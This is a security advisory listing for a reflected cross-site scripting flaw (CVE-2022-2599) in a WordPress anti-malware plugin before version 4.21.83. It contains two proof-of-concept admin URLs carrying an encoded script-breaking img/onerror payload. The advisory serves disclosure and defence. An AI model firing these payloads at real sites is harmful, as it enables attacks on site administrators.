Lucene search
Krzysztof ZającWPEX-ID:276A7FC5-3D0D-446D-92CF-20060AECD0EFHistoryAug 03, 2022 - 12:00 a.m.
Anti-Malware Security and Brute-Force Firewall < 4.21.83 - Reflected Cross-Site Scripting
2022-08-0300:00:00
Krzysztof Zając
70
0.001 Low
EPSS
Percentile
43.6%
The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E
Also possible with the $_GET['eli'] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3ERelated
nvd
nvd
CVE-2022-2599
2022-08-29 18:15:09
patchstack
patchstack
openvas
openvas
wpvulndb
wpvulndb
nuclei
nuclei
prion
prion
Cross site scripting
2022-08-29 18:15:00
cvelist
cvelist
cve
cve
CVE-2022-2599
2022-08-29 18:15:09